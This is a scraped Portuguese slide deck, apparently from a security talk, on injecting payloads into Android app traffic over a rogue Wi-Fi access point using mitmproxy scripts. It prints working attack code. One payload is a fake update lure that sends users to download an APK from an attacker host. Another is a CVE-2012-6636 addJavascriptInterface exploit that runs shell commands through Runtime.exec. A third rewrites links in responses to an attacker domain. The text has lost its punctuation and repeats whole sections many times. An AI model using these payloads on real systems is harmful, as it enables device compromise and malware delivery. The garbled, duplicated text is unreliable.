- Slide 29
- Slide 30
-
Setup operacional
Android SDK
ndash AVD Android 403 CPUABI Intel Atom mitmproxyorg
ndash Scripts em python para manipular requests e responses codegooglecompandroid-apktool
ndash descompactar e produzir os smali githubcomegiraultgoogleplay-apigit
ndash scripts para baixar aplicativos do play mitm na real
ndash iptables e airbase-ng
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
def response(ctx flow)
if flowresponsecontent = None and isXml(flowresponseheaders[Content-Type]) etype = flowresponseheaders[Content-Encoding] flowresponsedecode() root = etreeXML(flowresponsecontent parser)
processXML(root)
flowresponsecontent = etreetostring(root encoding=UTF-8) flowresponseheaders[Content-Encoding] = etype if gzip in etype flowresponseencode(gzip)
elif flowresponsecontent = None and (isJson(flowresponseheaders[Content-Type]) or isJavascript(flowresponseheaders[Content-Type]) ) hellip
elif flowresponsecontent = None and isHtmlText( flowresponseheaders[Content-Type] ) hellip
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
Injetando
def processXML(data log) for child in dataiter() if child = None if childtag = None and isinstance(childtag basestring) if len(child) == 0 if childtext = None if scanForHtmlTag(childtext) childtext = payload
payload = ltimg width=30 height=43 title= alt= src=dataimagepngbase64
XML
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload else processJson(data[key]) else return
JSON
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Injetando
htmldata = BeautifulSoup(flowresponsecontent) body = htmldatabody bodyappend(payload)
HTML
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Engenharia Social
Aplicativo da Veja
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload1
class public LcommateravejauiStoryDetail hellip
method private createWebView()V hellip
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Payload 1
Payload 1
Payload 1
Uma imagem bonita hellip
ndash ldquoseu aplicativo estaacute desatualizado e em riscordquo Um pouco de javascript
ltscriptgtfunction fase2() var img = documentgetElementById(chupacabra) imgsrc = dataimagegifbase64 thanks function goDown() windowlocationhref = httpjokercomcommateravejaapk setTimeout( fase2 3000 )ltscriptgt
ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
